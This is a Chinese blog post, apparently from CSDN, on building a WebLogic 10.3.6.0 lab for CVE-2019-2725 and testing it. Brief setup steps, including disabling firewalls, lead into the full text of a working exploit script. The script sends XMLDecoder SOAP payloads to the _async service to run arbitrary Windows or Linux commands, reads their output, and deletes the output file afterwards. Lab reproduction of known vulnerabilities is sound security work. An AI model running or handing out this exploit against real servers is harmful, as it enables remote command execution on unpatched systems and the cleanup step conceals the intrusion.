CVE-2019-2725漏洞环境搭建与测试

搭建漏洞环境(被攻击)

  1. 安装weblogic 10.3.6.0
    1. 关闭windows防火墙
    2. 打开安装包,一直下一步,直到出现如下界面

然后一直下一步

安装完成后

      

进入C:\Oracle\Middleware\user_projects\domains\base_domain,双击脚本

     用浏览器访问http://127.0.0.1:7001/console/login/LoginForm.jsp出现界面则搭建完成

通过 ipconfig 查看被攻击环境IP地址用作攻击地址

搭建攻击测试环境

攻击测试流程

1. 关闭攻击机的防火墙 ,关闭web服务防护

2. 打开cmd,将cve2019-2725_weblogic_rce.bat拖入窗口,会显示文件的当前位置,加一个空格,输入http://192.168.xxx.xxx:7001 “ver”

 

点击回车,查看被攻击机反应

 

@if (@vul) == (@VUL) @end /*****
@echo off
title cve2019-2725_RCE - Weblogic _async remote command execution by Flyfish
cscript //E:JScript //nologo "%~f0" "%~nx0" %* 
exit /b %errorlevel%
CVE-2019-2725 weblogic_rce command execution output version 
Author:Flyfish
https://github.com/FlyfishSec/weblogic_rce *****/

whr = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
args = WScript.Arguments;
exp_str = Math.random();
payload_xml_pre = "<soapenv:Envelope xmlns:soapenv=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\" xmlns:wsa=\"http:\/\/www.w3.org\/2005\/08\/addressing\" xmlns:asy=\"http:\/\/www.bea.com\/async\/AsyncResponseService\">  \r\n  <soapenv:Header> \r\n    <wsa:Action>log<\/wsa:Action>\r\n    <wsa:RelatesTo>log<\/wsa:RelatesTo>\r\n    <work:WorkContext xmlns:work=\"http:\/\/bea.com\/2004\/06\/soap\/workarea\/\">";
payload_xml_suff = "    <\/work:WorkContext>\r\n  <\/soapenv:Header>\r\n  <soapenv:Body>\r\n    <asy:onAsyncDelivery\/>\r\n  <\/soapenv:Body>\r\n<\/soapenv:Envelope>";
payload_xml_win_pre = "<java class=\"java.beans.XMLDecoder\"> \r\n        <object class=\"java.lang.Runtime\" method=\"getRuntime\"> \r\n          <void method=\"exec\"> \r\n            <array class=\"java.lang.String\" length=\"3\"> \r\n              <void index=\"0\"> \r\n                <string>c:\\windows\\system32\\cmd.exe<\/string> \r\n              <\/void>  \r\n              <void index=\"1\"> \r\n                <string>\/c<\/string> \r\n              <\/void>  \r\n              <void index=\"2\"> \r\n                <string>";
payload_xml_linux_pre = "<java version=\"1.4.0\" class=\"java.beans.XMLDecoder\"> \r\n        <void class=\"java.lang.ProcessBuilder\"> \r\n          <array class=\"java.lang.String\" length=\"3\"> \r\n            <void index=\"0\"> \r\n              <string>\/bin\/bash<\/string> \r\n            <\/void>  \r\n            <void index=\"1\"> \r\n              <string>-c<\/string> \r\n            <\/void>  \r\n            <void index=\"2\"> \r\n              <string>";
payload_xml_win_suff = "<\/string> \r\n              <\/void> \r\n            <\/array> \r\n          <\/void> \r\n        <\/object> \r\n      <\/java>";
payload_xml_linux_suff = "<\/string> \r\n            <\/void> \r\n          <\/array>  \r\n          <void method=\"start\"\/>\r\n        <\/void> \r\n      <\/java>";
command_output_linux = " > .\/servers\/AdminServer\/tmp\/_WL_internal\/bea_wls9_async_response\/8tpkys\/war\/access.log";
command_output_win = " > .\/servers\/AdminServer\/tmp\/_WL_internal\/bea_wls9_async_response\/8tpkys\/war\/access" + exp_str + ".log";
command_linux_clean = "rm -f .\/servers\/AdminServer\/tmp\/_WL_internal\/bea_wls9_async_response\/8tpkys\/war\/access.log";
command_win_clean = "del \/q .\\servers\\AdminServer\\tmp\\_WL_internal\\bea_wls9_async_response\\8tpkys\\war\\access*.log";

if (args.Length == 3 ) {
    url = args.Item(1) + "/_async/AsyncResponseService";
    command_output_linux = args.Item(2) + command_output_linux
    payload = payload_xml_pre + payload_xml_linux_pre + command_output_linux + payload_xml_linux_suff + payload_xml_suff;
    request(url);
    WScript.Sleep(202);
        if (whr.status == "202"){
        url = args.Item(1) + "/_async/access.log"
        payload = "";
        request(url)
        //WScript.Echo(whr.status);
        //WScript.Echo(whr.statustext);
        if (whr.status == "200") {
            WScript.Echo();
            WScript.Echo(whr.responseText);
            url = args.Item(1) + "/_async/AsyncResponseService";
            payload = payload_xml_pre + payload_xml_linux_pre + command_linux_clean + payload_xml_linux_suff + payload_xml_suff;
            request(url);
        } else if (whr.status != "200") {
            url = args.Item(1) + "/_async/AsyncResponseService";
            command_output_win = args.Item(2) + command_output_win;
            payload = payload_xml_pre + payload_xml_win_pre + command_output_win + payload_xml_win_suff + payload_xml_suff;
            request(url);
            WScript.Sleep(202);
	if (whr.status == "202") {
                    url = args.Item(1) + "/_async/access" + exp_str + ".log";
                    payload = "";
                    request(url);
                    if (whr.status == "200") {
                        WScript.Echo(whr.responseText);
                        //WScript.Echo(url);
                        url = args.Item(1) + "/_async/AsyncResponseService";
	                payload = payload_xml_pre + payload_xml_win_pre + command_win_clean + payload_xml_win_suff + payload_xml_suff;
                        request(url);
                } else {
                    WScript.Echo("-The Command execution failed");
                }
            } else {
                WScript.Echo("-The vulnerability does not exist");
            }
        } else {
            WScript.Echo("-The Command execution failed");
        }
    } else {
        WScript.Echo("-The vulnerability does not exist");     
    }
    WScript.Quit(666);
} else {
    WScript.Echo("-Wrong arguments!");
}
function request(url) {
    var RESOLVE_TIMEOUT = 10000;
    var CONNECT_TIMEOUT = 15000;
    var SEND_TIMEOUT = 10000;
    var RECEIVE_TIMEOUT = 15000;
    whr.open('POST', url, false);
    whr.Option(4) = 13056;  
    whr.Option(6) = false; 
    whr.SetRequestHeader("User-Agent", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3");
    whr.setRequestHeader("Accept", "*/*")
    whr.setRequestHeader("Content-Type","text/xml")
    whr.SetRequestHeader("Referer", "http://www.baidu.com/")
    whr.SetRequestHeader("Cache-Control","no-cache");
    whr.SetRequestHeader("Connection", "Close")
    whr.send(payload);
}

 

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值